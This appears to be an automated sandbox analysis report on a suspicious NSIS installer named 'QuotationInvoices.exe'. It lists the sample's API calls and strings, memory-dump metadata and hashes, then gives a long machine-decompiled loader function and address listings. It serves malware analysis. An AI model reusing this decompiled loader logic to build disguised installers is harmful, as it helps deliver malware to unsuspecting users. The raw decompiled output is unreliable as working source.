Part of subcall function 0040396E: CloseHandle.KERNEL32(0000029C,C:\Users\user\AppData\Local\Temp\,004037A5,?,?,00000007,00000009,0000000B), ref: 00403994

OleUninitialize.OLE32(?,?,00000007,00000009,0000000B), ref: 004037A5
ExitProcess.KERNEL32 ref: 004037C6
GetCurrentProcess.KERNEL32(00000028,?,00000007,00000009,0000000B), ref: 004038E3
OpenProcessToken.ADVAPI32(00000000), ref: 004038EA
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403902
AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00403921
ExitWindowsEx.USER32(00000002,80040002), ref: 00403945
ExitProcess.KERNEL32 ref: 00403968

Part of subcall function 00405969: MessageBoxIndirectA.USER32 ref: 004059C4

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 00403782
C:\Users\user\Desktop\QuotationInvoices.exe, xrefs: 00403883
SeShutdownPrivilege, xrefs: 004038FC
C:\Users\user\AppData\Local\Temp, xrefs: 00403676, 00403777, 00403821, 0040382A
Setup Setup, xrefs: 0040354E
TMP, xrefs: 004036DE
NSIS Error, xrefs: 00403549
"C:\Users\user\Desktop\QuotationInvoices.exe" , xrefs: 0040355E, 00403564, 0040371B
", xrefs: 004035B9
1033, xrefs: 004036F2
C:\Users\user\Desktop, xrefs: 004037F8, 004037FD, 00403829
Error launching installer, xrefs: 0040375D
Low, xrefs: 004036C4
.tmp, xrefs: 004037ED
Error writing temporary file. Make sure your temp folder is valid., xrefs: 0040349A
C:\Users\user\AppData\Local\Temp\, xrefs: 00403686, 0040368B, 004036A1, 004036AD, 004036BC, 004036C9, 004036D5, 004036DD, 004037D6, 004037E7, 004037F2, 004037FE, 0040380B, 0040381A, 004038C9
TEMP, xrefs: 004036D6
~nsu, xrefs: 004037D1
UXTHEME, xrefs: 004034D8, 004034DD, 004034E3
\Temp, xrefs: 004036A8

Memory Dump Source

Source File: 00000000.00000002.665386128.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.665371835.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665435897.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665469747.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665525375.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665561077.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665587795.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665608924.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$ExitFileHandle$CloseEnvironmentPathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpi
String ID: "$"C:\Users\user\Desktop\QuotationInvoices.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\QuotationInvoices.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$Setup Setup$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 538718688-1328584735
Opcode ID: bce7611ef083b11c86201e58ac83bb6660836d391cee400c05623c2e8ee166ca
Instruction ID: 85d02637fd436e9256356bfe7db61a6cd0141c067df2f5210ca69e4cdec71f05
Opcode Fuzzy Hash: bce7611ef083b11c86201e58ac83bb6660836d391cee400c05623c2e8ee166ca
Instruction Fuzzy Hash: C9C125705047416AD7217F719D49B2B3EACAF4170AF45487FF482B61E2CB7C8A198B2E

Uniqueness

Uniqueness Score: -1.00%

Function 6FC51A98, Relevance: 20.1, APIs: 13, Instructions: 591
stringlibrarymemoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E6FC51A98() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				CHAR* _v24;
				CHAR* _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				CHAR* _v48;
				signed int _v52;
				void* _v56;
				intOrPtr _v60;
				CHAR* _t207;
				signed int _t210;
				void* _t212;
				void* _t214;
				CHAR* _t216;
				void* _t224;
				struct HINSTANCE__* _t225;
				struct HINSTANCE__* _t226;
				struct HINSTANCE__* _t228;
				signed short _t230;
				struct HINSTANCE__* _t233;
				struct HINSTANCE__* _t235;
				void* _t236;
				char* _t237;
				void* _t248;
				signed char _t249;
				signed int _t250;
				void* _t254;
				struct HINSTANCE__* _t256;
				void* _t257;
				signed int _t259;
				intOrPtr _t260;
				char* _t263;
				signed int _t268;
				signed int _t271;
				signed int _t273;
				void* _t276;
				void* _t280;
				struct HINSTANCE__* _t282;
				intOrPtr _t285;
				void _t286;
				signed int _t287;
				signed int _t299;
				signed int _t300;
				intOrPtr _t303;
				void* _t304;
				signed int _t308;
				signed int _t311;
				signed int _t314;
				signed int _t315;
				signed int _t316;
				intOrPtr _t319;
				intOrPtr* _t320;
				CHAR* _t321;
				CHAR* _t323;
				CHAR* _t324;
				struct HINSTANCE__* _t325;
				void* _t327;
				signed int _t328;
				void* _t329;

				_t282 = 0;
				_v32 = 0;
				_v36 = 0;
				_v16 = 0;
				_v8 = 0;
				_v40 = 0;
				_t329 = 0;
				_v52 = 0;
				_v44 = 0;
				_t207 = E6FC51215();
				_v24 = _t207;
				_v28 = _t207;
				_v48 = E6FC51215();
				_t320 = E6FC5123B();
				_v56 = _t320;
				_v12 = _t320;
				while(1) {
					_t210 = _v32;
					_v60 = _t210;
					if(_t210 != _t282 && _t329 == _t282) {
						break;
					}
					_t319 =  *_t320;
					_t285 = _t319;
					_t212 = _t285 - _t282;
					if(_t212 == 0) {
						_t37 =  &_v32;
						 *_t37 = _v32 | 0xffffffff;
						__eflags =  *_t37;
						L20:
						_t214 = _v60 - _t282;
						if(_t214 == 0) {
							 *_v28 =  *_v28 & 0x00000000;
							__eflags = _t329 - _t282;
							if(_t329 == _t282) {
								_t254 = GlobalAlloc(0x40, 0x14a4); // executed
								_t329 = _t254;
								 *(_t329 + 0x810) = _t282;
								 *(_t329 + 0x814) = _t282;
							}
							_t286 = _v36;
							_t47 = _t329 + 8; // 0x8
							_t216 = _t47;
							_t48 = _t329 + 0x408; // 0x408
							_t321 = _t48;
							 *_t329 = _t286;
							 *_t216 =  *_t216 & 0x00000000;
							 *(_t329 + 0x808) = _t282;
							 *_t321 =  *_t321 & 0x00000000;
							_t287 = _t286 - _t282;
							__eflags = _t287;
							 *(_t329 + 0x80c) = _t282;
							 *(_t329 + 4) = _t282;
							if(_t287 == 0) {
								__eflags = _v28 - _v24;
								if(_v28 == _v24) {
									goto L42;
								}
								_t327 = 0;
								GlobalFree(_t329);
								_t329 = E6FC512FE(_v24);
								__eflags = _t329 - _t282;
								if(_t329 == _t282) {
									goto L42;
								} else {
									goto L35;
								}
								while(1) {
									L35:
									_t248 =  *(_t329 + 0x14a0);
									__eflags = _t248 - _t282;
									if(_t248 == _t282) {
										break;
									}
									_t327 = _t329;
									_t329 = _t248;
									__eflags = _t329 - _t282;
									if(_t329 != _t282) {
										continue;
									}
									break;
								}
								__eflags = _t327 - _t282;
								if(_t327 != _t282) {
									 *(_t327 + 0x14a0) = _t282;
								}
								_t249 =  *(_t329 + 0x810);
								__eflags = _t249 & 0x00000008;
								if((_t249 & 0x00000008) == 0) {
									_t250 = _t249 | 0x00000002;
									__eflags = _t250;
									 *(_t329 + 0x810) = _t250;
								} else {
									_t329 = E6FC51534(_t329);
									 *(_t329 + 0x810) =  *(_t329 + 0x810) & 0xfffffff5;
								}
								goto L42;
							} else {
								_t299 = _t287 - 1;
								__eflags = _t299;
								if(_t299 == 0) {
									L31:
									lstrcpyA(_t216, _v48);
									L32:
									lstrcpyA(_t321, _v24);
									goto L42;
								}
								_t300 = _t299 - 1;
								__eflags = _t300;
								if(_t300 == 0) {
									goto L32;
								}
								__eflags = _t300 != 1;
								if(_t300 != 1) {
									goto L42;
								}
								goto L31;
							}
						} else {
							if(_t214 == 1) {
								_t256 = _v16;
								if(_v40 == _t282) {
									_t256 = _t256 - 1;
								}
								 *(_t329 + 0x814) = _t256;
							}
							L42:
							_v12 = _v12 + 1;
							_v28 = _v24;
							L59:
							if(_v32 != 0xffffffff) {
								_t320 = _v12;
								continue;
							}
							break;
						}
					}
					_t257 = _t212 - 0x23;
					if(_t257 == 0) {
						__eflags = _t320 - _v56;
						if(_t320 <= _v56) {
							L17:
							__eflags = _v44 - _t282;
							if(_v44 != _t282) {
								L43:
								_t259 = _v32 - _t282;
								__eflags = _t259;
								if(_t259 == 0) {
									_t260 = _t319;
									while(1) {
										__eflags = _t260 - 0x22;
										if(_t260 != 0x22) {
											break;
										}
										_t320 = _t320 + 1;
										__eflags = _v44 - _t282;
										_v12 = _t320;
										if(_v44 == _t282) {
											_v44 = 1;
											L162:
											_v28 =  &(_v28[1]);
											 *_v28 =  *_t320;
											L58:
											_t328 = _t320 + 1;
											__eflags = _t328;
											_v12 = _t328;
											goto L59;
										}
										_t260 =  *_t320;
										_v44 = _t282;
									}
									__eflags = _t260 - 0x2a;
									if(_t260 == 0x2a) {
										_v36 = 2;
										L57:
										_t320 = _v12;
										_v28 = _v24;
										_t282 = 0;
										__eflags = 0;
										goto L58;
									}
									__eflags = _t260 - 0x2d;
									if(_t260 == 0x2d) {
										L151:
										_t303 =  *_t320;
										__eflags = _t303 - 0x2d;
										if(_t303 != 0x2d) {
											L154:
											_t263 = _t320 + 1;
											__eflags =  *_t263 - 0x3a;
											if( *_t263 != 0x3a) {
												goto L162;
											}
											__eflags = _t303 - 0x2d;
											if(_t303 == 0x2d) {
												goto L162;
											}
											_v36 = 1;
											L157:
											_v12 = _t263;
											__eflags = _v28 - _v24;
											if(_v28 <= _v24) {
												 *_v48 =  *_v48 & 0x00000000;
											} else {
												 *_v28 =  *_v28 & 0x00000000;
												lstrcpyA(_v48, _v24);
											}
											goto L57;
										}
										_t263 = _t320 + 1;
										__eflags =  *_t263 - 0x3e;
										if( *_t263 != 0x3e) {
											goto L154;
										}
										_v36 = 3;
										goto L157;
									}
									__eflags = _t260 - 0x3a;
									if(_t260 != 0x3a) {
										goto L162;
									}
									goto L151;
								}
								_t268 = _t259 - 1;
								__eflags = _t268;
								if(_t268 == 0) {
									L80:
									_t304 = _t285 + 0xffffffde;
									__eflags = _t304 - 0x55;
									if(_t304 > 0x55) {
										goto L57;
									}
									switch( *((intOrPtr*)(( *(_t304 + 0x6fc52259) & 0x000000ff) * 4 +  &M6FC521CD))) {
										case 0:
											__eax = _v24;
											__edi = _v12;
											while(1) {
												__edi = __edi + 1;
												_v12 = __edi;
												__cl =  *__edi;
												__eflags = __cl - __dl;
												if(__cl != __dl) {
													goto L132;
												}
												L131:
												__eflags =  *(__edi + 1) - __dl;
												if( *(__edi + 1) != __dl) {
													L136:
													 *__eax =  *__eax & 0x00000000;
													__eax = E6FC51224(_v24);
													__ebx = __eax;
													goto L97;
												}
												L132:
												__eflags = __cl;
												if(__cl == 0) {
													goto L136;
												}
												__eflags = __cl - __dl;
												if(__cl == __dl) {
													__edi = __edi + 1;
													__eflags = __edi;
												}
												__cl =  *__edi;
												 *__eax =  *__edi;
												__eax = __eax + 1;
												__edi = __edi + 1;
												_v12 = __edi;
												__cl =  *__edi;
												__eflags = __cl - __dl;
												if(__cl != __dl) {
													goto L132;
												}
												goto L131;
											}
										case 1:
											_v8 = 1;
											goto L57;
										case 2:
											_v8 = _v8 | 0xffffffff;
											goto L57;
										case 3:
											_v8 = _v8 & 0x00000000;
											_v20 = _v20 & 0x00000000;
											_v16 = _v16 + 1;
											goto L85;
										case 4:
											__eflags = _v20;
											if(_v20 != 0) {
												goto L57;
											}
											_v12 = _v12 - 1;
											__ebx = E6FC51215();
											 &_v12 = E6FC51A36( &_v12);
											__eax = E6FC51429(__edx, __eax, __edx, __ebx);
											goto L97;
										case 5:
											L105:
											_v20 = _v20 + 1;
											goto L57;
										case 6:
											_push(7);
											goto L123;
										case 7:
											_push(0x19);
											goto L143;
										case 8:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L107;
										case 9:
											_push(0x15);
											goto L143;
										case 0xa:
											_push(0x16);
											goto L143;
										case 0xb:
											_push(0x18);
											goto L143;
										case 0xc:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L118;
										case 0xd:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L109;
										case 0xe:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L111;
										case 0xf:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L122;
										case 0x10:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L113;
										case 0x11:
											_push(3);
											goto L123;
										case 0x12:
											_push(0x17);
											L143:
											_pop(__ebx);
											goto L98;
										case 0x13:
											__eax =  &_v12;
											__eax = E6FC51A36( &_v12);
											__ebx = __eax;
											__ebx = __eax + 1;
											__eflags = __ebx - 0xb;
											if(__ebx < 0xb) {
												__ebx = __ebx + 0xa;
											}
											goto L97;
										case 0x14:
											__ebx = 0xffffffff;
											goto L98;
										case 0x15:
											__eax = 0;
											__eflags = 0;
											goto L116;
										case 0x16:
											__ecx = 0;
											__eflags = 0;
											goto L91;
										case 0x17:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L120;
										case 0x18:
											_t270 =  *(_t329 + 0x814);
											__eflags = _t270 - _v16;
											if(_t270 > _v16) {
												_v16 = _t270;
											}
											_v8 = _v8 & 0x00000000;
											_v20 = _v20 & 0x00000000;
											_v36 - 3 = _t270 - (_v36 == 3);
											if(_t270 != _v36 == 3) {
												L85:
												_v40 = 1;
											}
											goto L57;
										case 0x19:
											L107:
											__ecx = 0;
											_v8 = 2;
											__ecx = 1;
											goto L91;
										case 0x1a:
											L118:
											_push(5);
											goto L123;
										case 0x1b:
											L109:
											__ecx = 0;
											_v8 = 3;
											__ecx = 1;
											goto L91;
										case 0x1c:
											L111:
											__ecx = 0;
											__ecx = 1;
											goto L91;
										case 0x1d:
											L122:
											_push(6);
											goto L123;
										case 0x1e:
											L113:
											_push(2);
											goto L123;
										case 0x1f:
											__eax =  &_v12;
											__eax = E6FC51A36( &_v12);
											__ebx = __eax;
											__ebx = __eax + 1;
											goto L97;
										case 0x20:
											L116:
											_v52 = _v52 + 1;
											_push(3);
											_pop(__ecx);
											goto L91;
										case 0x21:
											L120:
											_push(4);
											L123:
											_pop(__ecx);
											L91:
											__edi = _v16;
											__edx =  *(0x6fc5305c + __ecx * 4);
											__eax =  ~__eax;
											asm("sbb eax, eax");
											_v40 = 1;
											__edi = _v16 << 5;
											__eax = __eax & 0x00008000;
											__edi = (_v16 << 5) + __esi;
											__eax = __eax | __ecx;
											__eflags = _v8;
											 *(__edi + 0x818) = __eax;
											if(_v8 < 0) {
												L93:
												__edx = 0;
												__edx = 1;
												__eflags = 1;
												L94:
												__eflags = _v8 - 1;
												 *(__edi + 0x828) = __edx;
												if(_v8 == 1) {
													__eax =  &_v12;
													__eax = E6FC51A36( &_v12);
													__eax = __eax + 1;
													__eflags = __eax;
													_v8 = __eax;
												}
												__eax = _v8;
												 *((intOrPtr*)(__edi + 0x81c)) = _v8;
												_t136 = _v16 + 0x41; // 0x41
												_t136 = _t136 << 5;
												__eax = 0;
												__eflags = 0;
												 *((intOrPtr*)((_t136 << 5) + __esi)) = 0;
												 *((intOrPtr*)(__edi + 0x830)) = 0;
												 *((intOrPtr*)(__edi + 0x82c)) = 0;
												L97:
												__eflags = __ebx;
												if(__ebx == 0) {
													goto L57;
												}
												L98:
												__eflags = _v20;
												_v40 = 1;
												if(_v20 != 0) {
													L103:
													__eflags = _v20 - 1;
													if(_v20 == 1) {
														__eax = _v16;
														__eax = _v16 << 5;
														__eflags = __eax;
														 *(__eax + __esi + 0x82c) = __ebx;
													}
													goto L105;
												}
												_v16 = _v16 << 5;
												_t144 = __esi + 0x830; // 0x830
												__edi = (_v16 << 5) + _t144;
												__eax =  *__edi;
												__eflags = __eax - 0xffffffff;
												if(__eax <= 0xffffffff) {
													L101:
													__eax = GlobalFree(__eax);
													L102:
													 *__edi = __ebx;
													goto L103;
												}
												__eflags = __eax - 0x19;
												if(__eax <= 0x19) {
													goto L102;
												}
												goto L101;
											}
											__eflags = __edx;
											if(__edx > 0) {
												goto L94;
											}
											goto L93;
										case 0x22:
											goto L57;
									}
								}
								_t271 = _t268 - 1;
								__eflags = _t271;
								if(_t271 == 0) {
									_v16 = _t282;
									goto L80;
								}
								__eflags = _t271 != 1;
								if(_t271 != 1) {
									goto L162;
								}
								__eflags = _t285 - 0x6e;
								if(__eflags > 0) {
									_t308 = _t285 - 0x72;
									__eflags = _t308;
									if(_t308 == 0) {
										_push(4);
										L74:
										_pop(_t273);
										L75:
										__eflags = _v8 - 1;
										if(_v8 != 1) {
											_t96 = _t329 + 0x810;
											 *_t96 =  *(_t329 + 0x810) &  !_t273;
											__eflags =  *_t96;
										} else {
											 *(_t329 + 0x810) =  *(_t329 + 0x810) | _t273;
										}
										_v8 = 1;
										goto L57;
									}
									_t311 = _t308 - 1;
									__eflags = _t311;
									if(_t311 == 0) {
										_push(0x10);
										goto L74;
									}
									__eflags = _t311 != 0;
									if(_t311 != 0) {
										goto L57;
									}
									_push(0x40);
									goto L74;
								}
								if(__eflags == 0) {
									_push(8);
									goto L74;
								}
								_t314 = _t285 - 0x21;
								__eflags = _t314;
								if(_t314 == 0) {
									_v8 =  ~_v8;
									goto L57;
								}
								_t315 = _t314 - 0x11;
								__eflags = _t315;
								if(_t315 == 0) {
									_t273 = 0x100;
									goto L75;
								}
								_t316 = _t315 - 0x31;
								__eflags = _t316;
								if(_t316 == 0) {
									_t273 = 1;
									goto L75;
								}
								__eflags = _t316 != 0;
								if(_t316 != 0) {
									goto L57;
								}
								_push(0x20);
								goto L74;
							} else {
								_v32 = _t282;
								_v36 = _t282;
								goto L20;
							}
						}
						__eflags =  *((char*)(_t320 - 1)) - 0x3a;
						if( *((char*)(_t320 - 1)) != 0x3a) {
							goto L17;
						}
						__eflags = _v32 - _t282;
						if(_v32 == _t282) {
							goto L43;
						}
						goto L17;
					}
					_t276 = _t257 - 5;
					if(_t276 == 0) {
						__eflags = _v44 - _t282;
						if(_v44 != _t282) {
							goto L43;
						} else {
							__eflags = _v36 - 3;
							_v32 = 1;
							_v8 = _t282;
							_v20 = _t282;
							_v16 = (0 | _v36 == 0x00000003) + 1;
							_v40 = _t282;
							goto L20;
						}
					}
					_t280 = _t276 - 1;
					if(_t280 == 0) {
						__eflags = _v44 - _t282;
						if(_v44 != _t282) {
							goto L43;
						} else {
							_v32 = 2;
							_v8 = _t282;
							_v20 = _t282;
							goto L20;
						}
					}
					if(_t280 != 0x16) {
						goto L43;
					} else {
						_v32 = 3;
						_v8 = 1;
						goto L20;
					}
				}
				GlobalFree(_v56);
				GlobalFree(_v24);
				GlobalFree(_v48);
				if(_t329 == _t282 ||  *(_t329 + 0x80c) != _t282) {
					L182:
					return _t329;
				} else {
					_t224 =  *_t329 - 1;
					if(_t224 == 0) {
						_t187 = _t329 + 8; // 0x8
						_t323 = _t187;
						__eflags =  *_t323;
						if( *_t323 != 0) {
							_t225 = GetModuleHandleA(_t323); // executed
							__eflags = _t225 - _t282;
							 *(_t329 + 0x808) = _t225;
							if(_t225 != _t282) {
								L171:
								_t192 = _t329 + 0x408; // 0x408
								_t324 = _t192;
								_t226 = E6FC515C2( *(_t329 + 0x808), _t324);
								__eflags = _t226 - _t282;
								 *(_t329 + 0x80c) = _t226;
								if(_t226 == _t282) {
									__eflags =  *_t324 - 0x23;
									if( *_t324 == 0x23) {
										_t195 = _t329 + 0x409; // 0x409
										_t230 = E6FC512FE(_t195);
										__eflags = _t230 - _t282;
										if(_t230 != _t282) {
											__eflags = _t230 & 0xffff0000;
											if((_t230 & 0xffff0000) == 0) {
												 *(_t329 + 0x80c) = GetProcAddress( *(_t329 + 0x808), _t230 & 0x0000ffff);
											}
										}
									}
								}
								__eflags = _v52 - _t282;
								if(_v52 != _t282) {
									L178:
									_t324[lstrlenA(_t324)] = 0x41;
									_t228 = E6FC515C2( *(_t329 + 0x808), _t324);
									__eflags = _t228 - _t282;
									if(_t228 != _t282) {
										L166:
										 *(_t329 + 0x80c) = _t228;
										goto L182;
									}
									__eflags =  *(_t329 + 0x80c) - _t282;
									L180:
									if(__eflags != 0) {
										goto L182;
									}
									L181:
									_t205 = _t329 + 4;
									 *_t205 =  *(_t329 + 4) | 0xffffffff;
									__eflags =  *_t205;
									goto L182;
								} else {
									__eflags =  *(_t329 + 0x80c) - _t282;
									if( *(_t329 + 0x80c) != _t282) {
										goto L182;
									}
									goto L178;
								}
							}
							_t233 = LoadLibraryA(_t323); // executed
							__eflags = _t233 - _t282;
							 *(_t329 + 0x808) = _t233;
							if(_t233 == _t282) {
								goto L181;
							}
							goto L171;
						}
						_t188 = _t329 + 0x408; // 0x408
						_t235 = E6FC512FE(_t188);
						 *(_t329 + 0x80c) = _t235;
						__eflags = _t235 - _t282;
						goto L180;
					}
					_t236 = _t224 - 1;
					if(_t236 == 0) {
						_t185 = _t329 + 0x408; // 0x408
						_t237 = _t185;
						__eflags =  *_t237;
						if( *_t237 == 0) {
							goto L182;
						}
						_t228 = E6FC512FE(_t237);
						L165:
						goto L166;
					}
					if(_t236 != 1) {
						goto L182;
					}
					_t81 = _t329 + 8; // 0x8
					_t283 = _t81;
					_t325 = E6FC512FE(_t81);
					 *(_t329 + 0x808) = _t325;
					if(_t325 == 0) {
						goto L181;
					}
					 *(_t329 + 0x84c) =  *(_t329 + 0x84c) & 0x00000000;
					 *((intOrPtr*)(_t329 + 0x850)) = E6FC51224(_t283);
					 *(_t329 + 0x83c) =  *(_t329 + 0x83c) & 0x00000000;
					 *((intOrPtr*)(_t329 + 0x848)) = 1;
					 *((intOrPtr*)(_t329 + 0x838)) = 1;
					_t90 = _t329 + 0x408; // 0x408
					_t228 =  *(_t325->i + E6FC512FE(_t90) * 4);
					goto L165;
				}
			}

0x6fc51aa0
0x6fc51aa3
0x6fc51aa6
0x6fc51aa9
0x6fc51aac
0x6fc51aaf
0x6fc51ab2
0x6fc51ab4
0x6fc51ab7
0x6fc51aba
0x6fc51abf
0x6fc51ac2
0x6fc51aca
0x6fc51ad2
0x6fc51ad4
0x6fc51ad7
0x6fc51adf
0x6fc51adf
0x6fc51ae4
0x6fc51ae7
0x00000000
0x00000000
0x6fc51af1
0x6fc51af3
0x6fc51af8
0x6fc51afa
0x6fc51b8b
0x6fc51b8b
0x6fc51b8b
0x6fc51b8f
0x6fc51b92
0x6fc51b94
0x6fc51bb6
0x6fc51bb9
0x6fc51bbb
0x6fc51bc4
0x6fc51bca
0x6fc51bcc
0x6fc51bd2
0x6fc51bd2
0x6fc51bd8
0x6fc51bdb
0x6fc51bdb
0x6fc51bde
0x6fc51bde
0x6fc51be4
0x6fc51be6
0x6fc51be9
0x6fc51bef
0x6fc51bf2
0x6fc51bf2
0x6fc51bf4
0x6fc51bfa
0x6fc51bfd
0x6fc51c21
0x6fc51c24
0x00000000
0x00000000
0x6fc51c27
0x6fc51c29
0x6fc51c37
0x6fc51c3a
0x6fc51c3c
0x00000000
0x00000000
0x00000000
0x00000000
0x6fc51c3e
0x6fc51c3e
0x6fc51c3e
0x6fc51c44
0x6fc51c46
0x00000000
0x00000000
0x6fc51c48
0x6fc51c4a
0x6fc51c4c
0x6fc51c4e
0x00000000
0x00000000
0x00000000
0x6fc51c4e
0x6fc51c50
0x6fc51c52
0x6fc51c54
0x6fc51c54
0x6fc51c5a
0x6fc51c60
0x6fc51c62
0x6fc51c76
0x6fc51c76
0x6fc51c78
0x6fc51c64
0x6fc51c6a
0x6fc51c6d
0x6fc51c6d
0x00000000
0x6fc51bff
0x6fc51bff
0x6fc51bff
0x6fc51c00
0x6fc51c08
0x6fc51c0c
0x6fc51c12
0x6fc51c16
0x00000000
0x6fc51c16
0x6fc51c02
0x6fc51c02
0x6fc51c03
0x00000000
0x00000000
0x6fc51c05
0x6fc51c06
0x00000000
0x00000000
0x00000000
0x6fc51c06
0x6fc51b96
0x6fc51b97
0x6fc51ba0
0x6fc51ba3
0x6fc51bb0
0x6fc51bb0
0x6fc51ba5
0x6fc51ba5
0x6fc51c7e
0x6fc51c81
0x6fc51c84
0x6fc51cf6
0x6fc51cfa
0x6fc51adc
0x00000000
0x6fc51adc
0x00000000
0x6fc51cfa
0x6fc51b94
0x6fc51b00
0x6fc51b03
0x6fc51b66
0x6fc51b69
0x6fc51b7a
0x6fc51b7a
0x6fc51b7d
0x6fc51c89
0x6fc51c8c
0x6fc51c8c
0x6fc51c8e
0x6fc52033
0x6fc52045
0x6fc52045
0x6fc52047
0x00000000
0x00000000
0x6fc52037
0x6fc52038
0x6fc5203b
0x6fc5203e
0x6fc520ba
0x6fc520c1
0x6fc520c6
0x6fc520c9
0x6fc51cf2
0x6fc51cf2
0x6fc51cf2
0x6fc51cf3
0x00000000
0x6fc51cf3
0x6fc52040
0x6fc52042
0x6fc52042
0x6fc52049
0x6fc5204b
0x6fc520ae
0x6fc51ce7
0x6fc51cea
0x6fc51ced
0x6fc51cf0
0x6fc51cf0
0x00000000
0x6fc51cf0
0x6fc5204d
0x6fc5204f
0x6fc52055
0x6fc52055
0x6fc52057
0x6fc5205a
0x6fc5206d
0x6fc5206d
0x6fc52070
0x6fc52073
0x00000000
0x00000000
0x6fc52075
0x6fc52078
0x00000000
0x00000000
0x6fc5207a
0x6fc52081
0x6fc52081
0x6fc52087
0x6fc5208a
0x6fc520a6
0x6fc5208c
0x6fc52095
0x6fc52098
0x6fc52098
0x00000000
0x6fc5208a
0x6fc5205c
0x6fc5205f
0x6fc52062
0x00000000
0x00000000
0x6fc52064
0x00000000
0x6fc52064
0x6fc52051
0x6fc52053
0x00000000
0x00000000
0x00000000
0x6fc52053
0x6fc51c94
0x6fc51c94
0x6fc51c95
0x6fc51dde
0x6fc51dde
0x6fc51de5
0x6fc51de8
0x00000000
0x00000000
0x6fc51df5
0x00000000
0x6fc51fdb
0x6fc51fde
0x6fc51fe1
0x6fc51fe1
0x6fc51fe2
0x6fc51fe5
0x6fc51fe7
0x6fc51fe9
0x00000000
0x00000000
0x6fc51feb
0x6fc51feb
0x6fc51fee
0x6fc52000
0x6fc52003
0x6fc52006
0x6fc5200c
0x00000000
0x6fc5200c
0x6fc51ff0
0x6fc51ff0
0x6fc51ff2
0x00000000
0x00000000
0x6fc51ff4
0x6fc51ff6
0x6fc51ff8
0x6fc51ff8
0x6fc51ff8
0x6fc51ff9
0x6fc51ffb
0x6fc51ffd
0x6fc51fe1
0x6fc51fe2
0x6fc51fe5
0x6fc51fe7
0x6fc51fe9
0x00000000
0x00000000
0x00000000
0x6fc51fe9
0x00000000
0x6fc51e3c
0x00000000
0x00000000
0x6fc51e48
0x00000000
0x00000000
0x6fc51e2f
0x6fc51e33
0x6fc51e37
0x00000000
0x00000000
0x6fc51fad
0x6fc51fb1
0x00000000
0x00000000
0x6fc51fb7
0x6fc51fbf
0x6fc51fc6
0x6fc51fce
0x00000000
0x00000000
0x6fc51f15
0x6fc51f15
0x00000000
0x00000000
0x6fc51e51
0x00000000
0x00000000
0x6fc5202b
0x00000000
0x00000000
0x6fc51f1d
0x6fc51f1f
0x6fc51f1f
0x00000000
0x00000000
0x6fc5201b
0x00000000
0x00000000
0x6fc5201f
0x00000000
0x00000000
0x6fc52027
0x00000000
0x00000000
0x6fc51f64
0x6fc51f66
0x6fc51f66
0x00000000
0x00000000
0x6fc51f2f
0x6fc51f31
0x6fc51f31
0x00000000
0x00000000
0x6fc51f41
0x6fc51f43
0x6fc51f43
0x00000000
0x00000000
0x6fc51f72
0x6fc51f74
0x6fc51f74
0x00000000
0x00000000
0x6fc51f4c
0x6fc51f4e
0x6fc51f4e
0x00000000
0x00000000
0x6fc51f53
0x00000000
0x00000000
0x6fc52023
0x6fc5202d
0x6fc5202d
0x00000000
0x00000000
0x6fc51f7d
0x6fc51f81
0x6fc51f86
0x6fc51f89
0x6fc51f8a
0x6fc51f8d
0x6fc51f93
0x6fc51f93
0x00000000
0x00000000
0x6fc52013
0x00000000
0x00000000
0x6fc51f57
0x6fc51f57
0x00000000
0x00000000
0x6fc51e58
0x6fc51e58
0x00000000
0x00000000
0x6fc51f6b
0x6fc51f6d
0x6fc51f6d
0x00000000
0x00000000
0x6fc51dfc
0x6fc51e02
0x6fc51e05
0x6fc51e07
0x6fc51e07
0x6fc51e0a
0x6fc51e0e
0x6fc51e1b
0x6fc51e1d
0x6fc51e23
0x6fc51e23
0x6fc51e23
0x00000000
0x00000000
0x6fc51f20
0x6fc51f20
0x6fc51f22
0x6fc51f29
0x00000000
0x00000000
0x6fc51f67
0x6fc51f67
0x00000000
0x00000000
0x6fc51f32
0x6fc51f32
0x6fc51f34
0x6fc51f3b
0x00000000
0x00000000
0x6fc51f44
0x6fc51f44
0x6fc51f46
0x00000000
0x00000000
0x6fc51f75
0x6fc51f75
0x00000000
0x00000000
0x6fc51f4f
0x6fc51f4f
0x00000000
0x00000000
0x6fc51f9b
0x6fc51f9f
0x6fc51fa4
0x6fc51fa7
0x00000000
0x00000000
0x6fc51f59
0x6fc51f59
0x6fc51f5c
0x6fc51f5e
0x00000000
0x00000000
0x6fc51f6e
0x6fc51f6e
0x6fc51f77
0x6fc51f77
0x6fc51e5a
0x6fc51e5a
0x6fc51e5d
0x6fc51e64
0x6fc51e66
0x6fc51e68
0x6fc51e6f
